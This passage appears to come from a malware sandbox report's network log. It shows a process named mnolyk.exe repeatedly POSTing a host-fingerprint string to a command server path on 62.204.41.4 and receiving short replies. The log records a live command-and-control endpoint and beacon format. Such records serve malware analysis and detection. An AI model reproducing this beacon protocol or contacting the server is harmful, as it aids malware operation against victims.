                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      277 | 192.168.2.7 | 50004 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:15.494599104 CET | 730 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.559858084 CET | 730 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      278 | 192.168.2.7 | 50005 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:15.731218100 CET | 731 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.797847986 CET | 731 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      279 | 192.168.2.7 | 50006 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:15.979490995 CET | 732 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.047143936 CET | 732 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      28 | 192.168.2.7 | 49752 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:04.410535097 CET | 460 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.474786043 CET | 460 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      280 | 192.168.2.7 | 50007 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:16.259881020 CET | 733 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.324100971 CET | 733 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      281 | 192.168.2.7 | 50008 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:16.510742903 CET | 734 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.574184895 CET | 734 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      282 | 192.168.2.7 | 50009 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:16.756198883 CET | 735 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.821732044 CET | 735 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      283 | 192.168.2.7 | 50010 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:17.037592888 CET | 736 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.105997086 CET | 736 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      284 | 192.168.2.7 | 50011 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:17.285007000 CET | 737 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.352391958 CET | 737 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      285 | 192.168.2.7 | 50012 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:17.535419941 CET | 738 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.602504969 CET | 738 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      286 | 192.168.2.7 | 50013 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:17.791987896 CET | 739 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.858150005 CET | 739 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      287 | 192.168.2.7 | 50014 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:18.030709982 CET | 740 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.095983982 CET | 740 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      288 | 192.168.2.7 | 50015 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:18.281532049 CET | 741 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.347068071 CET | 741 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      289 | 192.168.2.7 | 50016 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:18.532773972 CET | 742 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.598366022 CET | 742 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      29 | 192.168.2.7 | 49753 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:04.648624897 CET | 461 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.715003014 CET | 461 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      290 | 192.168.2.7 | 50017 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:18.799280882 CET | 743 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.864867926 CET | 743 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      291 | 192.168.2.7 | 50018 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:19.057348967 CET | 744 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.123569012 CET | 744 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      292 | 192.168.2.7 | 50019 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:19.314760923 CET | 745 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.379559040 CET | 745 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      293 | 192.168.2.7 | 50020 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:19.544836998 CET | 746 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
